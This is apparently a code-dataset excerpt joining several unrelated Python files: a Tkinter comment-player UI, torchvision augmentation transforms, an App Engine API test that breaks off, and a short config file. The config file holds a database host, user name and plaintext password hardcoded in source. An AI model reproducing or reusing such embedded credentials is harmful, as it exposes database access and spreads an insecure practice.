                        borderColor=ui_consts.SECOND_BC_HIGHLIGHT_COLOR:
                        handleEventMouseEnter(event, wgControl, borderSize, borderColor))
    etrCurrentTime.bind("<Leave>", lambda event, wgControl=etrCurrentTime, borderSize=0:
                        handleEventMouseLeave(event, wgControl, borderSize))
    imgData1 = (ui_consts.IMAGE_PATH_BTN_PLAY_LEAVE, (22, 22), main.isTimeStatePlay, True)
    etrCurrentTime.bind("<FocusIn>", lambda event, wgControl=btnPlayPause, borderSize=0,
                        borderColor="white", imgData1=imgData1:
                        handleEventFocusIn(event, wgControl, borderSize, borderColor, imgData1, None,
                        function=configPauseTime))
    # Note 1: configPauseTime() is used instead of handleEventButtonPlayPauseLeftClick(),
    # because the latter moves focus to the play/pause button, taking focus away from
    # etrCurrentTime.  It also calls main.timeManagement(), which is not needed here.
    # Note 2: the FocusIn event is still needed, despite the StringVar trace, because
    # handleEventFocusIn sets the lastWidgetFocusIn variable to the widget that
    # owns the event.
    etrCurrentTime.place(x=72, y=119)
    printEntry(etrCurrentTime, "00:00:00", CENTER)

    # Playback-speed option menu.
    defaultOptionMenuValue = StringVar()
    defaultOptionMenuValue.set(ui_consts.DEFAULT_OPTION_MENU1_VALUE)
    optionMenu1 = OptionMenu(root, defaultOptionMenuValue, *ui_consts.OPTION_MENU1_VALUES, command=handleOptionMenuSelectChange)
    optionMenu1["font"] = (ui_consts.FONT_NAME, ui_consts.FONT_SIZE1)
    optionMenu1["bg"] = ui_consts.CONTROLS_BG_COLOR
    optionMenu1["fg"] = ui_consts.SECOND_FG_COLOR
    optionMenu1["bd"] = 0
    optionMenu1["direction"] = "above"
    optionMenu1["highlightthickness"] = 0
    optionMenu1["relief"] = GROOVE
    optionMenu1["width"] = 4
    optionMenu1["height"] = 1
    optionMenu1.place(x=247, y=117)

    # Thin marker overlaid on the time bar to show the current position.
    load_image5 = Image.open(ui_consts.IMAGE_PATH_CURRENT_TIME_BAR)
    load_image5 = load_image5.resize((1, 4), Image.ANTIALIAS) # Resizing the image
    render_image5 = ImageTk.PhotoImage(load_image5)
    global lblCurrentTimeBar
    lblCurrentTimeBar = Label(root, image=render_image5)
    lblCurrentTimeBar.image = render_image5
    lblCurrentTimeBar["bd"] = 0
    lblCurrentTimeBar["highlightthickness"] = 0
    lblCurrentTimeBar.place(x=10, y=145)

    # UI responsible for displaying the comments:
    global cnvComments
    cnvComments = Canvas(root)
    cnvComments["width"] = 318
    cnvComments["height"] = 320
    cnvComments["highlightthickness"] = 0
    cnvComments["bg"] = ui_consts.DEFAULT_BG_COLOR
    cnvComments.place(x=2, y=163)

    global commentsFrame
    global scrbarCanvasComment
    commentsFrame = Frame(cnvComments, background = "#FFFFFF")
    scrbarCanvasComment = Scrollbar(root, orient = "vertical", command = cnvComments.yview)
    cnvComments.configure(yscrollcommand = scrbarCanvasComment.set)

    scrbarCanvasComment.pack(side="right", fill="y")
    cnvComments.create_window((4,4), window=commentsFrame, anchor="nw")
    commentsFrame.bind("<Configure>", lambda event, canvas=cnvComments: onFrameConfigure(canvas))

    # Checkbox controlling auto-scroll to the latest comment.
    global CkbScrollbarAutoMoveVar
    CkbScrollbarAutoMoveVar = IntVar()
    CkbScrollbarAutoMove = Checkbutton(root, variable=CkbScrollbarAutoMoveVar, command=handleCkbScrollbarAutoMove)
    CkbScrollbarAutoMove["text"] = "Mover automaticamente para Comentário"
    CkbScrollbarAutoMove["font"] = entryFont
    CkbScrollbarAutoMove["bg"] = ui_consts.DEFAULT_BG_COLOR
    CkbScrollbarAutoMove.place(x=0, y=480)

    # Status bar at the bottom of the window.
    global lblStatusBar
    lblStatusBar = Label(root)
    lblStatusBar["bg"] = ui_consts.CONTROLS_BG_COLOR
    lblStatusBar["width"] = 45
    lblStatusBar["fg"] = ui_consts.SECOND_FG_COLOR
    lblStatusBar["anchor"] = W
    lblStatusBar.place(x=0, y=510)
def onFrameConfigure(canvas):
    """Reset the scroll region to encompass the inner frame."""
    canvas["scrollregion"] = canvas.bbox("all")
def handleEventMouseEnter(event, wgControl, borderSize = 1, borderColor = "black", imgData1 = None, imgData2 = None,
                          function = None, execConditionFunc = None, execConditionValue = None):
    """Mouse-enter wrapper: delegates to handleEvent, then logs.

    imgData layout: (image path, (width, height), condition function, condition value).
    """
    handleEvent(event, wgControl, borderSize, borderColor,
                imgData1, imgData2,
                function, execConditionFunc, execConditionValue)
    print("MOUSE ENTER!")
def handleEventFocusIn(event, wgControl, borderSize = 1, borderColor = "black", imgData1 = None, imgData2 = None,
                       function = None, execConditionFunc = None, execConditionValue = None):
    """Focus-in wrapper: remembers which widget got focus, then delegates.

    imgData layout: (image path, (width, height), condition function, condition value).
    """
    global lastWidgetFocusIn
    # Record the widget path name so other callbacks can tell who had focus last.
    lastWidgetFocusIn = str(event.widget)
    handleEvent(event, wgControl, borderSize, borderColor,
                imgData1, imgData2,
                function, execConditionFunc, execConditionValue)
    print("FOCUS IN!")
def handleEventFocusOut(event, wgControl, borderSize = 1, borderColor = "black", imgData1 = None, imgData2 = None,
                        function = None, execConditionFunc = None, execConditionValue = None):
    """Focus-out wrapper: simply delegates to handleEvent.

    imgData layout: (image path, (width, height), condition function, condition value).
    """
    handleEvent(event, wgControl, borderSize, borderColor,
                imgData1, imgData2,
                function, execConditionFunc, execConditionValue)
def handleEvent(event, wgControl, borderSize = 1, borderColor = "black", imgData1 = None, imgData2 = None,
                function = None, execConditionFunc = None, execConditionValue = None):
    """Core handler shared by the mouse/focus event wrappers.

    imgData layout: (image path, (width, height), condition function, condition value).
    Applies at most one of imgData1/imgData2 to wgControl (imgData1 wins when
    both are applicable), updates the widget's highlight border, and finally
    invokes `function` if one was supplied.

    When both execConditionFunc and execConditionValue are given, nothing
    happens unless execConditionFunc() == execConditionValue.
    """
    if execConditionFunc is not None and execConditionValue is not None:
        if execConditionFunc() != execConditionValue:
            return

    def _applyImage(imgData):
        # Load, resize and install the image described by imgData on wgControl.
        load_image = Image.open(imgData[0])
        load_image = load_image.resize(imgData[1], Image.ANTIALIAS)
        render_image = ImageTk.PhotoImage(load_image)
        wgControl.configure(image=render_image)
        # Keep a reference on the widget so Tk does not garbage-collect it.
        wgControl.image = render_image

    changeImg = False
    if imgData1 is not None:
        if imgData1[2] is not None:
            # Conditional image: apply only when the condition matches.
            if imgData1[2]() == imgData1[3]:
                _applyImage(imgData1)
                changeImg = True
        else:
            _applyImage(imgData1)
            changeImg = True

    # imgData2 is a fallback, used only when imgData1 did not apply.
    if imgData2 is not None and not changeImg:
        if imgData2[2] is not None:
            if imgData2[2]() == imgData2[3]:
                _applyImage(imgData2)
        else:
            _applyImage(imgData2)

    wgControl["highlightthickness"] = borderSize
    wgControl["highlightbackground"] = borderColor

    if function is not None:
        function()
def handleEventMouseLeave(event, wgControl, borderSize = 1, borderColor = "black", imgData1 = None, imgData2 = None,
                function = None, execConditionFunc = None, execConditionValue = None):
    """Mouse-leave handler: delegate to the generic handleEvent, then log.

    imgData structure: (image path, (width, height), condition function, condition value)
    """
    handleEvent(event, wgControl, borderSize=borderSize, borderColor=borderColor,
                imgData1=imgData1, imgData2=imgData2, function=function,
                execConditionFunc=execConditionFunc, execConditionValue=execConditionValue)
    print("MOUSE LEAVE!")
def handleEventMouseLeftClick(event, wgControl, borderSize = 1, borderColor = "black", imgData1 = None, imgData2 = None,
                function = None, execConditionFunc = None, execConditionValue = None):
    """Left-click handler: delegate to the generic handleEvent, then log.

    imgData structure: (image path, (width, height), condition function, condition value)
    """
    handleEvent(event, wgControl, borderSize=borderSize, borderColor=borderColor,
                imgData1=imgData1, imgData2=imgData2, function=function,
                execConditionFunc=execConditionFunc, execConditionValue=execConditionValue)
    print("CLIQUE")
def loadCommentsByTxtFile(entryFilePath):
    """Ask the user for a .txt comments file, show its path in *entryFilePath*,
    and hand it to the main module for loading."""
    filepath = askopenfilename(filetypes=(('text files', 'txt'),))
    printEntry(entryFilePath, filepath)
    # Although the Windows file-selection GUI prevents entering invalid paths,
    # there is no guarantee that other OSes perform the same validation,
    # so we validate here.
    if (not isValidFilePath(filepath)):
        return
    main.setFilePath(filepath)
    main.commentsManagement()
def isValidFilePath(filepath):
    """Return True when *filepath* refers to an existing filesystem entry."""
    pathExists = os.path.exists(filepath)
    return pathExists
def printEntry(wgEntry, string, aligment = "left"):
    """Replace the contents of the Entry widget *wgEntry* with *string*.

    The widget is temporarily switched to the "normal" state so that
    read-only entries can still be rewritten; the previous state is
    restored afterwards.
    """
    savedState = wgEntry["state"]
    wgEntry["state"] = "normal"
    wgEntry.delete(0, END)
    wgEntry.insert(0, string)
    wgEntry["justify"] = aligment
    wgEntry["state"] = savedState
def showInfoMsgBox(title, message, showMsgFuncCondition = None, showMsgValueCondition = None,
                   callbackFunction=None, callbackCondition=None):
    """Show an info message box (when the optional condition allows it) and
    run the optional callback depending on the user's answer."""
    if not isRunMsgBox(showMsgFuncCondition, showMsgValueCondition):
        return
    answer = messagebox.showinfo(title=title, message=message)
    runMsgBoxCallback(answer, callbackFunction, callbackCondition)
def isRunMsgBox(showMsgFuncCondition = None, showMsgValueCondition = None):
    """Decide whether a message box should be shown.

    With no condition pair supplied the answer is always True; otherwise the
    condition function's result must equal the expected value.
    """
    if showMsgFuncCondition == None or showMsgValueCondition == None:
        return True
    return showMsgFuncCondition() == showMsgValueCondition
def showWarningMsgBox(title, message, showMsgFuncCondition = None, showMsgValueCondition = None,
                      callbackFunction=None, callbackCondition=None):
    """Show a warning message box (when the optional condition allows it) and
    run the optional callback depending on the user's answer."""
    if not isRunMsgBox(showMsgFuncCondition, showMsgValueCondition):
        return
    answer = messagebox.showwarning(title=title, message=message)
    runMsgBoxCallback(answer, callbackFunction, callbackCondition)
def showErrorMsgBox(title, message, showMsgFuncCondition = None, showMsgValueCondition = None,
                    callbackFunction=None, callbackCondition=None):
    """Show an error message box (when the optional condition allows it) and
    run the optional callback depending on the user's answer."""
    if not isRunMsgBox(showMsgFuncCondition, showMsgValueCondition):
        return
    answer = messagebox.showerror(title=title, message=message)
    runMsgBoxCallback(answer, callbackFunction, callbackCondition)
def showAskOkCancelMsgBox(title, message, showMsgFuncCondition = None, showMsgValueCondition = None,
                          callbackFunction=None, callbackCondition=None):
    """Show an OK/Cancel question box (when the optional condition allows it)
    and run the optional callback depending on the user's answer."""
    if not isRunMsgBox(showMsgFuncCondition, showMsgValueCondition):
        return
    answer = messagebox.askokcancel(title=title, message=message)
    runMsgBoxCallback(answer, callbackFunction, callbackCondition)
def showAskYesNoMsgBox(title, message, showMsgFuncCondition = None, showMsgValueCondition = None,
                       callbackFunction=None, callbackCondition=None):
    """Show a Yes/No question box (when the optional condition allows it) and
    run the optional callback depending on the user's answer."""
    if not isRunMsgBox(showMsgFuncCondition, showMsgValueCondition):
        return
    answer = messagebox.askyesno(title=title, message=message)
    runMsgBoxCallback(answer, callbackFunction, callbackCondition)
def runMsgBoxCallback(msgBoxReturn, callbackFunction, callbackCondition):
    """Invoke *callbackFunction* only when both callback arguments were given
    and the message-box answer equals *callbackCondition*."""
    haveCallback = callbackFunction != None and callbackCondition != None
    if haveCallback and msgBoxReturn == callbackCondition:
        callbackFunction()
def addComment(comment):
    """Render one comment (author badge, author name, time, text) as Message
    widgets in the comments frame, mark it as loaded, and queue its widgets.

    *comment* is a dict with keys "abbreviatedAuthorName", "authorName",
    "time" and "text" (as read elsewhere in this function).
    """
    global currentCommentsUIRow
    global commentsFrame
    global UICommentsQueue
    colorAbbreviated = defineBackgroundColorAbbreviatedNameComment(comment) # defines the background color of the widget holding the abbreviated author name
    message1 = Message(commentsFrame)
    message1["text"] = comment["abbreviatedAuthorName"]
    message1.grid(row=currentCommentsUIRow, column=0)
    message2 = Message(commentsFrame)
    message2["text"] = comment["authorName"]
    message2.grid(row=currentCommentsUIRow, column=1)
    message3 = Message(commentsFrame)
    message3["text"] = comment["time"]
    message3.grid(row=currentCommentsUIRow, column=2)
    currentCommentsUIRow += 1
    message4 = Message(commentsFrame)
    message4["text"] = comment["text"]
    message4.grid(row=currentCommentsUIRow, column=1)
    currentCommentsUIRow += 1
    main.setCommentState(comment, 1)
    UIComment = {"wgAbbreviatedAuthorName": message1,
                 "colorAbbreviated": colorAbbreviated,
                 "wgAuthorName": message2, "wgTime": message3,
                 "wgText": message4}
    UICommentsQueue.append(UIComment)
    formatCommentForLoaded(len(UICommentsQueue) - 1)
def defineBackgroundColorAbbreviatedNameComment(comment):
    """Pick the badge background color for a comment's author.

    Reuses the color of an already-queued comment by the same author;
    otherwise picks a random one from the palette.
    """
    comment2 = searchUICommentByAuthorName(comment["authorName"])
    if(comment2 == None):
        # NOTE(review): randint(0, 10) assumes the palette has at least 11
        # entries — confirm against ui_consts.COLORS_ABBREVIATED_AUTHOR_NAME.
        colorAbbreviated = ui_consts.COLORS_ABBREVIATED_AUTHOR_NAME[randint(0, 10)]
    else:
        colorAbbreviated = comment2["colorAbbreviated"]
    return colorAbbreviated
def searchUICommentByAuthorName(authorName):
    """Return the first queued UI comment whose author name equals
    *authorName*, or None when no queued comment matches.
    """
    global UICommentsQueue
    # Iterate the queue directly instead of the range(len(...)) index pattern.
    for UIComment in UICommentsQueue:
        if (UIComment["wgAuthorName"]["text"] == authorName):
            return UIComment
    return None
def formatCommentForRead(index):
    """Restyle the queued comment at *index* to its "read" appearance
    (dimmed foreground colors, colored author badge)."""
    global UICommentsQueue
    UIComment = UICommentsQueue[index]
    UIComment["wgAbbreviatedAuthorName"]["bg"] = UIComment["colorAbbreviated"]
    UIComment["wgAuthorName"]["fg"] = ui_consts.THRID_FG_COLOR
    UIComment["wgTime"]["fg"] = ui_consts.TIME_COMMENT_FG_COLOR_READ_STATE
    UIComment["wgText"]["fg"] = ui_consts.THRID_FG_COLOR
def formatCommentForLoaded(index):
    """Restyle the queued comment at *index* to its initial "loaded"
    (not yet read) appearance: fonts, sizes and the loaded-state colors."""
    global UICommentsQueue
    UIComment = UICommentsQueue[index]
    UIComment["wgAbbreviatedAuthorName"].configure(width = 16, font=('Verdana', 8, 'normal'),
                                                   bg=ui_consts.COMMENT_FG_COLOR_LOADED_STATE, fg="#FFFFFF", bd=0)
    UIComment["wgAuthorName"].configure(font=('Verdana', 10, 'bold'), bg="#FFFFFF",
                                        fg=ui_consts.COMMENT_FG_COLOR_LOADED_STATE, bd=0, width=200, padx=10)
    UIComment["wgTime"].configure(font=('Verdana', 8, 'normal'), bg="#FFFFFF",
                                  fg=ui_consts.COMMENT_FG_COLOR_LOADED_STATE, bd=0, width=100)
    UIComment["wgText"].configure(font=('Verdana', 10, 'normal'), bg="#FFFFFF",
                                  fg=ui_consts.COMMENT_FG_COLOR_LOADED_STATE, bd=0, width=200, padx=10)
def updateStatusBar(text, backGroundColor = ui_consts.CONTROLS_BG_COLOR, fontColor = ui_consts.SECOND_FG_COLOR):
    """Set the status-bar label's text and colors and refresh the window."""
    global lblStatusBar
    global root
    lblStatusBar["text"] = text
    lblStatusBar["bg"] = backGroundColor
    lblStatusBar["fg"] = fontColor
    root.update() # refresh so any visual change to the status bar is shown immediately
def resetVariables():
    """Reset all UI state: scrollbar position, comments frame/queue/row
    counter, and the current-time entry. Call order matters (see comments)."""
    resetPositionScrbarCommentCanvas()
    resetCommentsFrame()
    resetCurrentCommentsUIRow() # must be called only after resetCommentsFrame()
    resetUICommentsQueue() # must be called only after resetPositionScrbarCommentCanvas()
    resetEtrCurrentTime()
def resetCurrentCommentsUIRow():
    """Reset the grid-row counter used when laying out comment widgets."""
    global currentCommentsUIRow
    currentCommentsUIRow = 0
def resetUICommentsQueue():
    """Empty the queue of UI comment widget dictionaries."""
    global UICommentsQueue
    UICommentsQueue.clear()
def resetCommentsFrame():
    """Destroy every widget inside the comments frame and reset the row counter."""
    # Deleting the widgets inside the frame:
    global currentCommentsUIRow
    global commentsFrame
    for widgets in commentsFrame.winfo_children():
        widgets.destroy()
    currentCommentsUIRow = 0
def resetEtrCurrentTime():
    """Reset the current-time entry to 00:00:00 and focus it."""
    global etrCurrentTime
    printEntry(etrCurrentTime, "00:00:00")
    etrCurrentTime.focus_set() # to trigger the focus event
def resetPositionScrbarCommentCanvas():
    """Scroll the comments canvas back to the first comment."""
    positionsScrbarByUIComment(0)
def configPauseTime():
    """Put the playback clock into the stopped state."""
    main.setTimeStateToStop()
def configPlayTime():
    """Put the playback clock into the playing state."""
    main.setTimeStateToPlay()
def handleEventPlayPauseButtonMouseLeftClick():
    """Toggle between play and pause when the play/pause button is clicked,
    after validating any manual edit of the current-time entry."""
    global root
    global btnPlayPause
    focusOnPlayPauseButton(btnPlayPause) # to take focus away from etrCurrentTime, in case the user clicked on it
    if(not validateCurrentTime()):
        return # validates the value in etrCurrentTime, in case the user changed it
    if(main.isTimeStatePlay()):
        configPauseTime()
    else:
        configPlayTime()
    main.timeManagement()
def validateCurrentTime():
    """Validate the HH:MM:SS value typed into the current-time entry.

    Returns True when the value is valid (or when the entry was not the last
    focused widget, i.e. the user did not edit it); on success also pushes the
    new time to the main module. On failure the entry turns red, a warning is
    shown in the status bar, and False is returned.
    """
    global etrCurrentTime
    if (not isEtrCurrentTimeLastWidgetFocusIn()):
        etrCurrentTime["fg"] = "white"
        updateStatusBar("")
        return True
    isvalidNumberSeparators = validateTotalNumberSeparatorsCurrentTime()
    if(not isvalidNumberSeparators):
        etrCurrentTime["fg"] = "red"
        updateStatusBar(ui_consts.ETR_CURRENT_TIME_WARNING_TEXT_MSG, "red")
        #showWarningMsgBox(ui_consts.ETR_CURRENT_TIME_WARNING_TITLE_MSG, ui_consts.ETR_CURRENT_TIME_WARNING_TEXT_MSG)
        return False # the two boolean checks cannot be combined in one if, because an invalid separator count breaks the next validation
    isvalidNumbers = validateNumbersCurrentTime()
    if (not isvalidNumbers):
        etrCurrentTime["fg"] = "red"
        updateStatusBar(ui_consts.ETR_CURRENT_TIME_WARNING_TEXT_MSG, "red")
        return False
    #showWarningMsgBox(ui_consts.ETR_CURRENT_TIME_WARNING_TITLE_MSG, ui_consts.ETR_CURRENT_TIME_WARNING_TEXT_MSG)
    etrCurrentTime["fg"] = "white"
    updateStatusBar("")
    main.setCurrentTime(main.convertStrTimeToSeconds(etrCurrentTime.get()))
    main.checkCommentsToChangeStateByCurrentTimeUserInput()
    return True
def validateTotalNumberSeparatorsCurrentTime():
    """Return True when the time entry contains exactly two separators
    (the HH:MM:SS shape)."""
    global etrCurrentTime
    return etrCurrentTime.get().count(ui_consts.ETR_CURRENT_TIME_SEPARATOR) == 2
def validateNumbersCurrentTime():
    """Return True when all three HH:MM:SS fields are numeric and the
    resulting time does not exceed the media's total time."""
    global etrCurrentTime
    h, m, s = etrCurrentTime.get().split(':')
    if (not h.isnumeric() or not m.isnumeric() or not s.isnumeric()):
        # isnumeric() returns False for an empty string
        return False
    totalTime = main.timeData["totalTime"]
    strCurrentTime = h + ":" + m + ":" + s
    currentTime = main.convertStrTimeToSeconds(strCurrentTime)
    return currentTime <= totalTime
def focusOnPlayPauseButton(buttonPlayPause):
    """Give keyboard focus to the play/pause button."""
    buttonPlayPause.focus_set()
def updateUICurrentTime(text):
    """Show *text* (HH:MM:SS) in the current-time entry and refresh the UI."""
    global etrCurrentTime
    global root
    printEntry(etrCurrentTime, text, aligment="center")
    root.update()
def updateUICurrentTimeBar(width):
    """Resize the progress-bar image to *width* pixels; hide it when width is 0."""
    global lblCurrentTimeBar
    global root
    if (width == 0):
        lblCurrentTimeBar.place_forget() # makes the widget invisible
        return
    lblCurrentTimeBar.place(x=10, y=145)
    load_image = Image.open(ui_consts.IMAGE_PATH_CURRENT_TIME_BAR)
    load_image = load_image.resize((width, lblCurrentTimeBar.image.height()), Image.ANTIALIAS)
    render_image = ImageTk.PhotoImage(load_image)
    #lblCurrentTimeBar.configure(image="") # deleting the previous image
    lblCurrentTimeBar.configure(image=render_image)
    lblCurrentTimeBar.image = render_image # keep a reference so Tk does not garbage-collect the image
    lblCurrentTimeBar["bd"] = 0
    lblCurrentTimeBar["highlightthickness"] = 0
    root.update()
def updateUITotalTime(text):
    """Show *text* in the total-time label and refresh the UI."""
    global lblTotalTime
    global root
    lblTotalTime["text"] = text
    root.update()
def handleOptionMenuSelectChange(value):
    """Playback-speed menu handler: *value* looks like "1.5x"; strip the
    trailing "x" and forward the float to the main module."""
    main.updateTimeVelocityByUI(float(value.rstrip("x")))
def handleEtrCurrentTimeChange(var):
    """Live input mask for the current-time entry (*var* is its StringVar):
    rejects non-ASCII and non-digit characters, caps the length at 8
    (HH:MM:SS) and auto-inserts the ':' separators."""
    global etrCurrentTime
    if (not isEtrCurrentTimeLastWidgetFocusIn()):
        return
    content = var.get()
    if (len(content) == 0):
        return
    if (not content.isascii()): # checks that every character is ASCII
        var.set("")
    lastCharInput = content[len(content) - 1]
    if (not isCharAsciiNumber(lastCharInput)):
        var.set(content[0:len(content) - 1])
    if(len(content) > 8):
        var.set(content[0:len(content) - 1])
    if (len(content) == 2 or len(content) == 5):
        etrCurrentTime.insert(END, ":")
def getUIComment(index):
    """Return the queued UI comment at *index*, or None when out of range."""
    global UICommentsQueue
    if 0 <= index < len(UICommentsQueue):
        return UICommentsQueue[index]
    return None
def positionsScrbarByUIComment(UIcommentIndex):
    """Auto-scroll the comments canvas so the comment at *UIcommentIndex*
    becomes visible (no-op when auto-scroll is disabled or index is invalid)."""
    global scrbarCanvasComment
    global cnvComments
    if (not main.isScrollBarAutoMoveEnabled()):
        return
    UIComment = getUIComment(UIcommentIndex)
    if (UIComment == None):
        return
    # Use the badge widget's position to compute the scrollbar fraction.
    xWgAbbName = UIComment["wgAbbreviatedAuthorName"].winfo_x()
    yWgAbbName = UIComment["wgAbbreviatedAuthorName"].winfo_y()
    fraction = scrbarCanvasComment.fraction(xWgAbbName, yWgAbbName)
    print("FRACTION = " + str(fraction))
    cnvComments.yview_moveto(fraction)
def isCharAsciiNumber(char):
    """Return True when *char* is one of the ASCII digits '0'-'9'
    (code points 48-57)."""
    return 48 <= ord(char) <= 57
def isEtrCurrentTimeLastWidgetFocusIn():
    """Return True when the last widget to receive focus was the
    current-time entry (compared by its Tk widget path name)."""
    global lastWidgetFocusIn
    return lastWidgetFocusIn == "." + ui_consts.ETR_CURRENT_TIME_NAME
def handleCkbScrollbarAutoMove():
    """Checkbox handler: forward the auto-scroll on/off state to the main module."""
    global CkbScrollbarAutoMoveVar
    print(CkbScrollbarAutoMoveVar.get())
    main.updateConfigScrollBarAutoMove(CkbScrollbarAutoMoveVar.get())
def defineRootProtocols():
    """Install the window-close protocol: show a Yes/No confirmation box and
    only close the app (handleEventcloseRoot) when the user answers Yes.

    The lambda binds all arguments as defaults so they are captured at
    definition time.
    """
    global root
    root.wm_protocol("WM_DELETE_WINDOW", lambda title=ui_consts.MSG_BOX_CLOSE_PROGRAM_TITLE,
                     message=ui_consts.MSG_BOX_CLOSE_PROGRAM_TEXT, showMsgFuncCondition=None,
                     showMsgValueCondition=None, callbackFunction = handleEventcloseRoot,
                     callbackCondition = True: showAskYesNoMsgBox(title, message, showMsgFuncCondition,
                     showMsgValueCondition, callbackFunction, callbackCondition))
def handleEventcloseRoot():
    """Close the main window, giving any background thread time to notice the
    shutdown flag before the Tk root is destroyed."""
    global root
    updateStatusBar(ui_consts.STATUS_BAR_CLOSE_PROGRAM)
    if (main.hasAliveThread()):
        main.isCloseProgram = True
        root.after(1000, root.destroy) # 1000 ms is the maximum time the second-counting thread goes without re-checking its loop condition
    else:
        root.destroy()
def executaUI():
    """Application entry point: create the Tk root, install the close
    protocol, build the UI and enter the main loop."""
    global root
    root = Tk()
    defineRootProtocols()
    buildUI(root)
    root.mainloop()
| 43.233094 | 179 | 0.734183 |
968bd7e966b21df41fe968cc089315cad32e78d9 | 1,936 | py | Python | transforms.py | hmdliu/Deep-Learning-S22 | c7753f543b64d3a7773d6ee3b64ea6018e141c4d | [
"MIT"
] | null | null | null | transforms.py | hmdliu/Deep-Learning-S22 | c7753f543b64d3a7773d6ee3b64ea6018e141c4d | [
"MIT"
] | null | null | null | transforms.py | hmdliu/Deep-Learning-S22 | c7753f543b64d3a7773d6ee3b64ea6018e141c4d | [
"MIT"
] | null | null | null |
# Mainly adopted from competition start code
import random
import torch
from torchvision.transforms import ColorJitter
from torchvision.transforms import functional as F
def _flip_coco_person_keypoints(kps, width):
    """Mirror COCO person keypoints horizontally inside an image of *width*.

    flip_inds swaps each left/right keypoint pair (eyes, ears, shoulders,
    elbows, wrists, hips, knees, ankles) while keeping nose (index 0) fixed.
    Assumes kps is indexed as [instance, keypoint, (x, y, visibility)] with
    17 keypoints — TODO confirm against the dataset producing these targets.
    """
    flip_inds = [0, 2, 1, 4, 3, 6, 5, 8, 7, 10, 9, 12, 11, 14, 13, 16, 15]
    flipped_data = kps[:, flip_inds]
    flipped_data[..., 0] = width - flipped_data[..., 0]
    # Maintain COCO convention that if visibility == 0, then x, y = 0
    inds = flipped_data[..., 2] == 0
    flipped_data[inds] = 0
    return flipped_data
class Compose(object):
    """Chain several (image, target) transforms, applying them in order."""
    def __init__(self, transforms):
        self.transforms = transforms
    def __call__(self, image, target):
        for transform in self.transforms:
            image, target = transform(image, target)
        return image, target
class RandomHorizontalFlip(object):
    """With probability *prob*, flip the image tensor and its detection
    target (boxes, and optionally masks and keypoints) horizontally."""
    def __init__(self, prob):
        # prob: probability in [0, 1] of applying the flip
        self.prob = prob
    def __call__(self, image, target):
        if random.random() < self.prob:
            # image is assumed to be a tensor with (..., H, W) layout — the
            # last dimension is width, which flip(-1) mirrors.
            height, width = image.shape[-2:]
            image = image.flip(-1)
            bbox = target["boxes"]
            # Mirror x-coordinates: new x1 = width - old x2, new x2 = width - old x1
            # (columns 0 and 2 are x1/x2; note the mutation is in place).
            bbox[:, [0, 2]] = width - bbox[:, [2, 0]]
            target["boxes"] = bbox
            if "masks" in target:
                target["masks"] = target["masks"].flip(-1)
            if "keypoints" in target:
                keypoints = target["keypoints"]
                keypoints = _flip_coco_person_keypoints(keypoints, width)
                target["keypoints"] = keypoints
        return image, target
class Jitter(object):
    """Apply a fixed, fairly aggressive color jitter to the image only;
    the target passes through unchanged."""
    def __init__(self):
        self.jitter = ColorJitter(
            brightness=[0.1, 2.0],
            contrast=[0.1, 2.0],
            saturation=[0.1, 2.0],
            hue=[-0.1, 0.1]
        )
    def __call__(self, image, target):
        return self.jitter(image), target
class ToTensor(object):
    """Convert the PIL image to a tensor; the target passes through unchanged."""
    def __call__(self, image, target):
        image = F.to_tensor(image)
        return image, target
9bbac4fa999498bf023dd8f9737e459dd888a8b5 | 92 | py | Python | auth_public.py | Marsovc1/Projektna-naloga-OPB | 61fba488fe7520f7db64482ca82b5226e11a44d9 | [
"MIT"
] | null | null | null | auth_public.py | Marsovc1/Projektna-naloga-OPB | 61fba488fe7520f7db64482ca82b5226e11a44d9 | [
"MIT"
] | 3 | 2020-08-04T08:53:08.000Z | 2020-08-18T19:33:49.000Z | auth_public.py | Marsovc1/Projektna-naloga-OPB | 61fba488fe7520f7db64482ca82b5226e11a44d9 | [
"MIT"
] | 1 | 2020-05-02T08:11:42.000Z | 2020-05-02T08:11:42.000Z | db = 'sem2020_nikolajc'
host = 'baza.fmf.uni-lj.si'
user = 'javnost'
password = 'javnogeslo' | 23 | 27 | 0.706522 |
8ad7c1528151e216b4616edef4577f055fbde958 | 2,399 | py | Python | appengine/trooper_o_matic/appengine_module/trooper_o_matic/test/controller_test.py | mithro/chromium-infra | d27ac0b230bedae4bc968515b02927cf9e17c2b7 | [
"BSD-3-Clause"
] | null | null | null | appengine/trooper_o_matic/appengine_module/trooper_o_matic/test/controller_test.py | mithro/chromium-infra | d27ac0b230bedae4bc968515b02927cf9e17c2b7 | [
"BSD-3-Clause"
] | null | null | null | appengine/trooper_o_matic/appengine_module/trooper_o_matic/test/controller_test.py | mithro/chromium-infra | d27ac0b230bedae4bc968515b02927cf9e17c2b7 | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import json
import unittest
import webapp2
import webtest
import endpoints
from protorpc import protojson
from appengine_module.trooper_o_matic import controller
from appengine_module.trooper_o_matic import cron
from appengine_module.trooper_o_matic import models
from appengine_module.trooper_o_matic import trooper_o_api
from appengine_module.trooper_o_matic.test import testing_common
from appengine_module.trooper_o_matic.test import test_data
from appengine_module.testing_utils import testing
def MockNow():
  """Deterministic stand-in for cron.datetime_now: always 2014-01-01 12:00."""
  return datetime.datetime(year=2014, month=1, day=1, hour=12)
class CoverageTest(testing.AppengineTestCase):
  """End-to-end check that the CQ-stats endpoint reproduces controller data."""
  def setUp(self): # pylint: disable=E1002
    """Build the endpoints test server, stub urlfetch, and freeze time."""
    super(CoverageTest, self).setUp()
    # restricted=False is needed for testing.
    # Initialized here because setUp() has to be run first.
    self.app_module = endpoints.api_server(
        [trooper_o_api.TrooperOMaticAPI],
        restricted=False
    )
    testing_common.StubUrlfetch(test_data.URLFETCH_RESPONSES,
                                stub=self.testbed.get_stub('urlfetch'))
    cron.datetime_now = MockNow
  def _make_api_call(self, method, params=None, status=None):
    """POST *params* to the named endpoints API method and return the response."""
    params = params or {}
    return self.test_app.post_json(
        '/_ah/spi/TrooperOMaticAPI.%s' % method,
        params=params,
        status=status,
    )
  def testCqStats(self):
    """Run the check-cq cron, then verify the API output matches controller.get_cq_stats."""
    project = 'chromium'
    cron_app = webtest.TestApp(
        webapp2.WSGIApplication([
            ('/check-cq', cron.CheckCQHandler),
        ])
    )
    cron_app.get('/check-cq')
    cq_data = self._make_api_call(
        'cq_stats_get',
        params={'project': project},
    ).json
    generated = {}
    # Decode each JSON payload back into its protorpc message type so the
    # comparison below is message-to-message rather than dict-to-message.
